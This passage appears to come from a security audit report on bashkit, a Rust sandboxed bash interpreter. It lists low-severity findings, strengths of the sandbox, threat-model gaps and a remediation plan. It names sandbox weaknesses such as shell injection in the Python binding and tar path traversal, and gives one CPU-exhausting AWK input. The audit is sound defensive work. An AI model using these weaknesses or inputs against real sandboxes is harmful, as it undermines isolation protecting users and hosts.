`hostname` configuration. After `reset()`, DoS protections are removed. - -**Fix:** Store original builder config and reapply on reset. - ---- - -## LOW Findings - -### L-1: `$$` Leaks Real Host Process ID - -**File:** `crates/bashkit/src/interpreter/mod.rs:7615` - -```rust -return std::process::id().to_string(); -``` - -Violates sandbox isolation by returning the real OS PID. **Fix:** Return a fixed or random value. - -### L-2: Cyclic Nameref Silently Resolves to Wrong Variable - -**File:** `crates/bashkit/src/interpreter/mod.rs:7547-7560` - -Cyclic namerefs (a->b->a) silently resolve to whatever variable is current after 10 iterations instead of producing an error. - -### L-3: `py_to_json` / `json_to_py` Unbounded Recursion - -**File:** `crates/bashkit-python/src/lib.rs:58-92` - -Deeply nested Python dicts/lists cause stack overflow in the recursive JSON conversion functions. - -**Fix:** Add a depth counter; fail beyond 64 levels. - -### L-4: Error Messages May Leak Internal State - -**Files:** `crates/bashkit/src/error.rs:38` (`Io` wraps `std::io::Error`), `network/client.rs:224` (reqwest errors), `git/client.rs` (VFS paths and remote URLs), `scripted_tool/execute.rs:323` (Debug-formatted errors) - -Internal details (host paths, resolved IPs, TLS info) can leak through error messages. The `scripted_tool` uses `{:?}` (Debug format) while `BashTool` uses `error_kind()` -- inconsistent. - -### L-5: URL Credentials Leaked in Blocked Error Messages - -**File:** `crates/bashkit/src/network/allowlist.rs:144` - -Full URL (including potential `user:pass@` in query strings or authority) is echoed in "URL not in allowlist" errors. - -### L-6: Integer Truncation on 32-bit Platforms - -**Files:** `crates/bashkit/src/network/client.rs:236,419` (`content_length as usize`), `crates/bashkit-python/src/lib.rs:197,200` (`u64 as usize` for limits) - -On 32-bit platforms, large values silently truncate, potentially bypassing size checks. - -### L-7: No Limit on AWK Loop Iterations - -**File:** `crates/bashkit/src/builtins/awk.rs` - -AWK `while`/`for` loops have no iteration limit. `BEGIN { while(1){} }` loops until the bash-level timeout fires (30s default), consuming CPU. - ---- - -## Positive Security Observations - -The following aspects of the security design are well-implemented: - -1. **Zero `unsafe` Rust** across the entire codebase -2. **Virtual filesystem** provides genuine process-level isolation -- no real host FS access -3. **Default-deny network** -- empty allowlist blocks all outbound requests -4. **No auto-redirect following** in HTTP client prevents allowlist bypass -5. **Compression bomb protection** -- auto-decompression disabled, ratio limits on archive extraction -6. **Rust `regex` crate** guarantees linear-time matching (no ReDoS) -7. **Builtin panic recovery** via `catch_unwind` with sanitized error messages -8. **Symlinks not followed** prevents symlink-based escape attacks -9. **HTTPS-only git remotes** with no external process execution -10. **Comprehensive resource limits** with per-`exec()` counter reset -11. **Log redaction** for secrets, URLs, API keys by default -12. **Python (Monty) sandbox** with no `os.system`, `subprocess`, `socket`, or `open()` -13. **Path normalization** consistently applied to collapse `..` traversal -14. **System builtins return virtual values** (hostname, whoami, uname, id) -15. **Fail-point injection testing** infrastructure for systematic security verification - ---- - -## Threat Model Gaps - -The existing threat model (`specs/006-threat-model.md`) does not cover: - -| Gap | Related Findings | -|-----|-----------------| -| Internal variable namespace injection | H-1 | -| Arithmetic overflow/panic | C-1 | -| ExtGlob exponential blowup | H-3 | -| VFS limit bypass via public API (`add_file`, `upper()`) | C-2 | -| Cross-layer limit accounting in OverlayFs | M-3, M-4, M-5 | -| `jq` process env pollution | H-4 | -| Python binding shell injection | H-5, H-6 | -| Parser limit bypass via eval/source/trap | H-2 | - ---- - -## Prioritized Remediation - -### Immediate (blocks production use) -1. **C-1**: Use wrapping/checked arithmetic in all arithmetic operations -2. **H-4**: Stop mutating `std::env` in jq builtin -3. **H-1**: Isolate internal variable namespace from user scripts - -### Short-term (next release) -4. **C-2**: Add limit checks to `add_file()`, restrict `upper()` visibility -5. **H-2**: Propagate parser limits to all `Parser::new()` call sites -6. **H-3**: Add depth limit to extglob matching -7. **H-5/H-6**: Fix shell injection in deepagents.py -8. **M-2**: Validate tar extraction paths stay within target directory -9. **M-8**: Fix `BashTool` custom builtin loss after first execution - -### Medium-term (hardening) -10. **M-1**: Fix TOCTOU in append_file -11. **M-3/M-4/M-5/M-6**: Fix OverlayFs limit accounting and whiteout propagation -12. **M-7**: Add `validate_path()` to all VFS methods -13. **M-9**: Validate git branch names -14. **M-10**: Preserve config on reset() -15. **H-7/H-8**: Fix Python binding GIL handling and runtime management